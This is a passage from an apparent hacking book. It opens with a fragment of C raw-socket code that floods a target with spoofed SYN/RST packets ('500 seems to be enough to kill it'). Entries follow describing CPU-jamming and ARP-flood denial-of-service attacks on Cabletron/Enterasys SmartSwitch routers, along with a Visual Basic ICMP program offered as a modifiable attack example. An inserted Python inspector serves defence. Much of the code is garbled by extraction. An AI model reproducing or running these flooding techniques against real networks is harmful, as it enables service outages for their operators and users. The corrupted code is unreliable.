    if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
        err ("Unable to open raw socket.\n");
    if (!(daddr = lookup (argv[1])))
        err ("Unable to lookup destination address.\n");
    dport = lookup_port (argv[2]);
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = daddr;
    sin.sin_port = dport;

fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1

r

fixhost ((struct sockaddr_in *)(struct sockaddr *) &remote, argv[

);

/* 500 seems to be enough to kill it */ for (i = 0; i < 500; i++)

start_seq++;

local.sin_addr.s_addr = random ();

spoof_packet (local, random (), remote, dport, start_seq, (in TH_SYN | TH_RST |



Cabletron/Enterasys



The unique products offered through Cabletron/Enterasys (www.enterasys.com) provide high-speed, high-performance network access from the desktop to the data center. Clearly a virtuous rival to Cisco, this innovative line of products leads with the SmartSwitch router family, found in more and more enterprise backbones and WAN gateways. These products are designed to provide the reliability and scalability demanded by today's enterprise networks, with four key benefits: wire-speed routing at gigabit speeds, pinpoint control over application usage, simplified management, and full-featured security.



Liabilities



CPU Jamming

Synopsis: SmartSwitch Router (SSR) product series are vulnerable to CPU flooding.

Hack State: Processing interference with flooding.

Vulnerabilities: SmartSwitch Router (SSR) series.

Breach: Hackers can flood the SSR CPU with processes simply by sending substantial packets (with TTL=0) through, with a destination IP address of all zeros. As explained earlier in this book, time-to-live (TTL) is defined in an IP header as how many hops a packet can travel before being dropped. A modifiable coding example of this technique, originally inspired by security enthusiast and programmer Jim Huff, is provided in the Icmpfld.bas listing and in Figure 9.3.
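The crashes on this page share one cause: IP stacks that trusted header fields they should have validated, whether the overlapping fragments Nestea.c sends, the random TCP data offset Ascend.c writes, or the TTL=0 packets addressed to 0.0.0.0 that jam the SSR CPU. The added Python example below (written for this page, not code from the book or from any vendor) is a small header inspector that parses IPv4, UDP and TCP headers with bounds checks and tags each of those conditions so a monitor or filter can log or drop them. The packets and addresses are constructed test data built by the helpers at the top; the tag names are this example's own, and no real product's parser is being reproduced.

```python
import struct
import ipaddress

def build_ipv4(src, dst, proto, payload=b"", ttl=64, ident=1, flags_frag=0):
    """Constructed test helper: 20-byte IPv4 header (no options) + payload, checksum 0."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, flags_frag,
                      ttl, proto, 0, ipaddress.IPv4Address(src).packed,
                      ipaddress.IPv4Address(dst).packed)
    return hdr + payload

def build_udp(sport, dport, payload=b""):
    """Constructed test helper: UDP header with a correct length field, checksum 0."""
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload

def parse_ipv4(pkt: bytes) -> dict:
    """Bounds-checked IPv4 header parse; raises ValueError instead of trusting the bytes."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    vihl, _tos, total, ident, ff, ttl, proto, _csum, s, d = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (vihl & 0x0F) * 4
    if vihl >> 4 != 4 or ihl < 20 or ihl > len(pkt):
        raise ValueError("bad version or IHL")
    return {
        "id": ident, "mf": bool(ff & 0x2000), "offset": (ff & 0x1FFF) * 8,
        "ttl": ttl, "proto": proto,
        "src": str(ipaddress.IPv4Address(s)), "dst": str(ipaddress.IPv4Address(d)),
        "payload": pkt[ihl:total] if total <= len(pkt) else pkt[ihl:],
        "total_mismatch": total != len(pkt),
    }

class Inspector:
    """Stateful check: remembers fragment byte ranges per (src, dst, id, proto)."""

    def __init__(self):
        self.frags = {}

    def check(self, pkt: bytes) -> list:
        tags = []
        try:
            ip = parse_ipv4(pkt)
        except ValueError:
            return ["malformed-ipv4"]
        if ip["ttl"] == 0:
            tags.append("ttl-zero")                 # SSR CPU-jamming packets
        if ip["dst"] == "0.0.0.0":
            tags.append("dst-zero")                 # all-zeros destination
        if ip["total_mismatch"]:
            tags.append("length-mismatch")
        fragmented = ip["mf"] or ip["offset"] > 0
        if fragmented:
            key = (ip["src"], ip["dst"], ip["id"], ip["proto"])
            seg = (ip["offset"], ip["offset"] + len(ip["payload"]))
            # Nestea-style overlap: a new fragment covers bytes an earlier one already did.
            if any(seg[0] < end and start < seg[1] for start, end in self.frags.get(key, [])):
                tags.append("frag-overlap")
            self.frags.setdefault(key, []).append(seg)
        pl = ip["payload"]
        if ip["offset"] == 0 and ip["proto"] == 17 and len(pl) >= 8:
            _sport, dport, ulen, _ucs = struct.unpack("!HHHH", pl[:8])
            if dport == 9:
                tags.append("udp-discard-port")     # Ascend discovery/crash port
            if not fragmented and ulen != len(pl):
                tags.append("udp-length-mismatch")
        if ip["offset"] == 0 and ip["proto"] == 6:
            if len(pl) < 20:
                tags.append("tcp-truncated")
            else:
                doff = (pl[12] >> 4) * 4            # TCP data offset, in bytes
                if doff < 20 or doff > len(pl):
                    tags.append("tcp-bad-data-offset")  # Ascend.c's random th_off
        return tags

if __name__ == "__main__":
    insp = Inspector()
    for p in (build_ipv4("192.0.2.10", "198.51.100.5", 17, b"\x00" * 18, ident=242, flags_frag=0x2000),
              build_ipv4("192.0.2.10", "198.51.100.5", 17, b"\x00" * 116, ident=242, flags_frag=6),
              build_ipv4("192.0.2.10", "198.51.100.5", 17, b"\x00" * 276, ident=242, flags_frag=0x2000),
              build_ipv4("192.0.2.10", "0.0.0.0", 17, build_udp(40000, 9), ttl=0)):
        print(insp.check(p))
```

The fragment ranges in the demonstration mirror the three datagrams Nestea.c builds (18 bytes at offset 0, 116 bytes at offset 48, then 276 bytes back at offset 0): the first two are individually unremarkable, and only the third, which overlaps both, earns a tag. That is why the reassembly state has to live across packets rather than in a per-packet rule.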



Icmpfld.bas



Dim iReturn As Long, sLowByte As String, sHighByte As String
Dim sMsg As String, HostLen As Long, Host As String
Dim Hostent As Hostent, PointerToPointer As Long, ListAddress As Long
Dim WSAdata As WSAdata, DotA As Long, DotAddr As String, ListAddr As Long
Dim MaxUDP As Long, MaxSockets As Long, i As Integer
Dim description As String, Status As String

Dim bReturn As Boolean, hIP As Long
Dim szBuffer As String
Dim Addr As Long
Dim RCode As String
Dim RespondingHost As String
Dim TraceRT As Boolean
Dim TTL As Integer

Const WS_VERSION_MAJOR = &H101 \ &H100 And &HFF&
Const WS_VERSION_MINOR = &H101 And &HFF&
Const MIN_SOCKETS_REQD = 0

Sub vbIcmpCloseHandle()
    bReturn = IcmpCloseHandle(hIP)
    If bReturn = False Then
        MsgBox "ICMP Closed with Error", vbOKOnly, "VB4032-ICMPEcho"
    End If
End Sub

Sub GetRCode()
    If pIPe.Status = 0 Then
        Text3.Text = Text3.Text + " Reply from " + RespondingHost + _
            ": Bytes = " + Trim$(CStr(pIPe.DataSize)) + _
            " RTT = " + Trim$(CStr(pIPe.RoundTripTime)) + "ms" + _
            " TTL = " + Trim$(CStr(pIPe.Options.TTL)) + Chr$(13) + Chr$(10)
    Else
        Text3.Text = Text3.Text + " Reply from " + RespondingHost + _
            ": " + RCode + Chr$(13) + Chr$(10)
    End If
    Else
        If TTL - 1 < 10 Then Text3.Text = Text3.Text + " Hop # 0" + CStr(TTL - 1) Else Text3.Text = Text3.Text + " Hop # " + CStr(TTL - 1)
        Text3.Text = Text3.Text + " " + RespondingHost + Chr$(13) + Chr$(10)
    End If
End Sub

Function HiByte(ByVal wParam As Integer)
    HiByte = wParam \ &H100 And &HFF&
End Function

Function LoByte(ByVal wParam As Integer)
    LoByte = wParam And &HFF&
End Function

Sub vbGetHostByName()
    Dim szString As String
    Host = Trim$(Text1.Text)                    ' Set variable Host to value in Text1.Text
    szString = String(64, &H0)
    Host = Host + Right$(szString, 64 - Len(Host))
    If gethostbyname(Host) = SOCKET_ERROR Then  ' If WSock32 error, then tell me about it
        sMsg = "Winsock Error" & Str$(WSAGetLastError())
        'MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho"
    Else
        PointerToPointer = gethostbyname(Host)  ' Get the pointer to the address of the winsock hostent structure
        CopyMemory Hostent.h_name, ByVal _
            PointerToPointer, Len(Hostent)      ' Copy Winsock structure to the VisualBasic structure
        ListAddress = Hostent.h_addr_list       ' Get the ListAddress of the Address List
        CopyMemory ListAddr, ByVal ListAddress, 4 ' Copy Winsock structure to the VisualBasic structure
        CopyMemory IPLong, ByVal ListAddr, 4    ' Get the first list entry from the Address List
        CopyMemory Addr, ByVal ListAddr, 4
        Label3.Caption = Trim$(CStr(Asc(IPLong.Byte4)) + "." + CStr(Asc(IPLong.Byte3)) _
            + "." + CStr(Asc(IPLong.Byte2)) + "." + CStr(Asc(IPLong.Byte1)))
    End If
End Sub

Sub vbGetHostName()
    Host = String(64, &H0)                      ' Set Host value to a bunch of spaces
    If gethostname(Host, HostLen) = SOCKET_ERROR Then ' This routine is where we get the host's name
        sMsg = "WSock32 Error" & Str$(WSAGetLastError()) ' If WSock32 error, then tell me about it
        'MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho"
        Host = Left$(Trim$(Host), Len(Trim$(Host)) - 1) ' Trim up the results
        Text1.Text = Host                       ' Display the host's name in label1
    End If
End Sub

Sub vbIcmpCreateFile()
    hIP = IcmpCreateFile()
    If hIP = 0 Then
        MsgBox "Unable to Create File Handle", vbOKOnly, "VBPing32"
    End If
End Sub

Sub vbIcmpSendEcho()
    Dim NbrOfPkts As Integer
    szBuffer = "abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvw" + _
        "abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklm"
    If IsNumeric(Text5.Text) Then
        If Val(Text5.Text) < 32 Then Text5.Text = "32"
        If Val(Text5.Text) > 128 Then Text5.Text = "128"
    Else
        Text5.Text = "32"
    End If
    szBuffer = Left$(szBuffer, Val(Text5.Text))
    If IsNumeric(Text4.Text) Then
        If Val(Text4.Text) < 1 Then Text4.Text = "1"
    Else
        Text4.Text = "1"
    End If
    If TraceRT = True Then Text4.Text = "1"
    For NbrOfPkts = 1 To Trim$(Text4.Text)
        DoEvents
        bReturn = IcmpSendEcho(hIP, Addr, szBuffer, Len(szBuffer), pIPo, _
            pIPe, Len(pIPe) + 8, 2700)

        If bReturn Then
            RespondingHost = CStr(pIPe.Address(0)) + "." + CStr(pIPe.Address(1)) + "." + _
                CStr(pIPe.Address(2)) + "." + CStr(pIPe.Address(3))

GetRCode

Else ' I hate it when this happens. If I get an ICM

P

timeout

' during a TRACERT, try again. If TraceRT Then TTL = TTL - 1

Else ' Don't worry about trying again on a PING, jus

t timeout

Text3.Text = Text3.Text + "ICMP Request Timeout" +

Chr$(13) + Chr$(10) End If End If Next NbrOfPkts End Sub



Sub vbWSACleanup()

' Subroutine to perform WSACleanup iReturn = WSACleanup()

If iReturn <> 0 Then ' If WSock32 error, then tell me abo

ut

it.

sMsg = "WSock32 Error -" & Trim$(Str$(iReturn)) & " occurred in Cleanup"

MsgBox sMsg, vbOKOnly, "VB4 032-ICMPEcho" End End If End Sub



Sub vbWSAStartup()

iReturn = WSAStartup(&H101, WSAdata)

If iReturn <> 0 Then ' If WSock32 error, then tell me about

it

MsgBox "WSock32.dll is not responding!", vbOKOnly, "VB4032-ICMPEcho" End If

If LoByte(WSAdata.wVersion) < WS_VERSION_MAJOR Or (LoByte(WSAdata.wVersion) = WS_VERSION_MAJOR And HiByte(WSAdata.wVersion) < WS_VERSION_MINOR) Then

sHighByte = Trim$(Str$(HiByte(WSAdata.wVersion))) sLowByte = Trim$(Str$(LoByte(WSAdata.wVersion))) sMsg = "WinSock Version " & sLowByte & "." & sHighByte sMsg = sMsg & " is not supported "

MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho" End End If

If WSAdata.iMaxSockets < MIN_SOCKETS_REQD Then

sMsg = "This application requires a minimum of "

sMsg = sMsg & Trim$(Str$(MIN_SOCKETS_REQD)) & " supported



sockets."

MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho" End End If

MaxSockets = WSAdata.iMaxSockets If MaxSockets < 0 Then

MaxSockets = 65536 + MaxSockets

End If

MaxUDP = WSAdata.iMaxUdpDg

If MaxUDP < 0 Then

MaxUDP = 65536 + MaxUDP

End If

description = ""

For i = 0 To WSADESCRIPTION_LEN

If WSAdata.szDescription(i) = 0 Then Exit For description = description + Chr$(WSAdata.szDescription(i

Next i

Status = ""

For i = 0 To WSASYS_STATUS_LEN

If WSAdata.szSystemStatus(i) = 0 Then Exit For Status = Status + Chr$(WSAdata.szSystemStatus(i))

Next i End Sub

Private Sub Command1_Click() Text3.Text = ""

vbWSAStartup ' Initialize Winsock

If Len(Text1.Text) = 0 Then

vbGetHostName

End If

If Text1.Text = "" Then

MsgBox "No Hostname Specified!", vbOKOnly, "VB4032-ICMPEcho"

' Complain if No Host Name Identified

vbWSACleanup Exit Sub End If

vbGetHostByName ' Get the IPAddress for the Host

vbIcmpCreateFile ' Get ICMP Handle

' The following determines the TTL of the ICMPEcho

If IsNumeric(Text2.Text) Then

If (Val(Text2.Text) > 255) Then Text2.Text = "255" If (Val(Text2.Text) < 2) Then Text2.Text = "2"

Else

Text2.Text = "255" End If

pIPo.TTL = Trim$(Text2.Text)

vbIcmpSendEcho ' Send the ICMP Echo Request

vbIcmpCloseHandle ' Close the ICMP Handle

vbWSACleanup ' Close Winsock

End Sub



Private Sub Command2_Click()

Text3.Text = "" End Sub

Private Sub Command3_Click()

Text3.Text = ""

vbWSAStartup ' Initialize Winsock

If Len(Text1.Text) = 0 Then

vbGetHostName

End If

If Text1.Text = "" Then

MsgBox "No Hostname Specified!", vbOKOnly, "VB4032-ICMPEcho"

' Complain if No Host Name Identified vbWSACleanup Exit Sub End If

vbGetHostByName ' Get the IPAddress for the Host

vbIcmpCreateFile ' Get ICMP Handle

' The following determines the TTL of the ICMPEcho for TRACE function

TraceRT = True

Text3.Text = Text3.Text + "Tracing Route to " + Label3.Caption

+

+ Chr$(13) + Chr$(10) + Chr$(13) + Chr$(10)

For TTL = 2 To 255 pIPo.TTL = TTL

vbIcmpSendEcho ' Send the ICMP Echo Request

DoEvents

If RespondingHost = Label3.Caption Then

Text3.Text = Text3.Text + Chr$(13) + Chr$(10) + "Route

Trace

has Completed" + Chr$(13) + Chr$(10) + Chr$(13) + Chr$(10)

Exit For

End If Next TTL TraceRT = False vbIcmpCloseHandle vbWSACleanup End Sub

Stop TraceRT



Close the ICMP Handle

Close Winsock





ICMP.bas:

Type Inet_address
    Byte4 As String * 1
    Byte3 As String * 1
    Byte2 As String * 1
    Byte1 As String * 1
End Type

Public IPLong As Inet_address

Type WSAdata
    wVersion As Integer
    wHighVersion As Integer
    szDescription(0 To 255) As Byte
    szSystemStatus(0 To 128) As Byte
    iMaxSockets As Integer
    iMaxUdpDg As Integer
    lpVendorInfo As Long
End Type

Type Hostent
    h_name As Long
    h_aliases As Long
    h_addrtype As Integer
    h_length As Integer
    h_addr_list As Long
End Type

Type IP_OPTION_INFORMATION
    TTL As Byte                        ' Time to Live (used for traceroute)
    Tos As Byte                        ' Type of Service (usually 0)
    Flags As Byte                      ' IP header Flags (usually 0)
    OptionsSize As Long                ' Size of Options data (usually 0, max 40)
    OptionsData As String * 128        ' Options data buffer
End Type

Public pIPo As IP_OPTION_INFORMATION

Type IP_ECHO_REPLY
    Address(0 To 3) As Byte            ' Replying Address
    Status As Long                     ' Reply Status
    RoundTripTime As Long              ' Round Trip Time in milliseconds
    DataSize As Integer                ' reply data size
    Reserved As Integer                ' for system use
    data As Long                       ' pointer to echo data
    Options As IP_OPTION_INFORMATION   ' Reply Options
End Type

Public pIPe As IP_ECHO_REPLY

Public Const SOCKET_ERROR = -1         ' Winsock failure return value tested by the form code

Declare Function gethostname Lib "wsock32.dll" (ByVal hostname$, ByVal HostLen&) As Long
Declare Function gethostbyname& Lib "wsock32.dll" (ByVal hostname$)
Declare Function WSAGetLastError Lib "wsock32.dll" () As Long
Declare Function WSAStartup Lib "wsock32.dll" (ByVal wVersionRequired&, lpWSAData As WSAdata) As Long
Declare Function WSACleanup Lib "wsock32.dll" () As Long
Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (hpvDest As Any, hpvSource As Any, ByVal cbCopy As Long)
Declare Function IcmpCreateFile Lib "icmp.dll" () As Long
Declare Function IcmpCloseHandle Lib "icmp.dll" (ByVal HANDLE As Long) As Boolean
Declare Function IcmpSendEcho Lib "ICMP" (ByVal IcmpHandle As Long, ByVal DestAddress As Long, _
    ByVal RequestData As String, ByVal RequestSize As Integer, RequestOptns As IP_OPTION_INFORMATION, _
    ReplyBuffer As IP_ECHO_REPLY, ByVal ReplySize As Long, ByVal TimeOut As Long) As Boolean



Denial-of-Service Attack

Synopsis: There is a DoS vulnerability in the SmartSwitch Router (SSR).

Hack State: Processing interference with flooding.

Vulnerabilities: SSR 8000 running firmware revision 2.x.

Breach: This bottleneck appears to occur in the ARP-handling mechanism of the SSR. Sending an abundance of ARP requests restricts the SSR, causing the router to stop processing. Anonymous attackers crash the SSR by customizing programs like icmp.c (which is available from the Tiger Tools repository on this book's CD).
